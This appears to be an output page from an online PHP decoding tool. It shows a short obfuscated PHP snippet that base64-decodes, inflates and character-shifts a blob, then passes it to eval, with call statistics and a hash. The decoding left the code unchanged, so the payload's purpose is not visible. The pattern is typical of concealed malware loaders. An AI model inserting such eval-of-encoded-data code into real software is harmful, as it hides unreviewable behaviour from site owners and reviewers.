Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function TVY($zsJe) { $zsJe=gzinflate(base64_decode($zsJe)); for($i=0;$i<strlen..
Decoded Output download
<?php function TVY($zsJe)
{
$zsJe=gzinflate(base64_decode($zsJe));
for($i=0;$i<strlen($zsJe);$i++)
{
$zsJe[$i] = chr(ord($zsJe[$i])-1);
}
return $zsJe;
}eval(TVY("FctBCkBAGIbhAzjFx4qSCyiuYKEsZDH4NJPhr5lfcnq8y6de4C8BFyt5NtAvchAqUEuMvYjf9uqzCTfn6JQVOk8TiWhNIJzidmrxyBWwBcdzjeU3m3P/Lc2KOmmbFw=="));?>
Did this file decode correctly?
Original Code
<?php function TVY($zsJe)
{
$zsJe=gzinflate(base64_decode($zsJe));
for($i=0;$i<strlen($zsJe);$i++)
{
$zsJe[$i] = chr(ord($zsJe[$i])-1);
}
return $zsJe;
}eval(TVY("FctBCkBAGIbhAzjFx4qSCyiuYKEsZDH4NJPhr5lfcnq8y6de4C8BFyt5NtAvchAqUEuMvYjf9uqzCTfn6JQVOk8TiWhNIJzidmrxyBWwBcdzjeU3m3P/Lc2KOmmbFw=="));?>
Function Calls
TVY | 1 |
chr | 102 |
ord | 102 |
strlen | 103 |
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | b635fcddd9311cc9ab15d36547850ae0 |
Eval Count | 1 |
Decode Time | 316 ms |